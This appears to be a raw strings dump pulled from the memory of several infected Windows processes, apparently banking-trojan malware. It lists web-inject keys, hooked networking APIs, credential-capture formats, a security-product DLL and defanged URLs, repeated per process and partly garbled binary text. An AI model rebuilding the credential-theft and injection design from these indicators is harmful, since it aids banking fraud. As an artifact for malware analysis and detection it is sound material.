hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%System%\config\systemprofile\Local Settings\Application Data\iwmikkry.log
%System%\config\systemprofile\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
svchost.exe_988_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\NetworkService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\NetworkService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
wmiprvse.exe_1068_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%System%\config\systemprofile\Local Settings\Application Data\iwmikkry.log
%System%\config\systemprofile\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
svchost.exe_1084_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
wurlmon.dll
wurlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\NetworkService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\NetworkService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
svchost.exe_1128_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\NetworkService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\NetworkService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
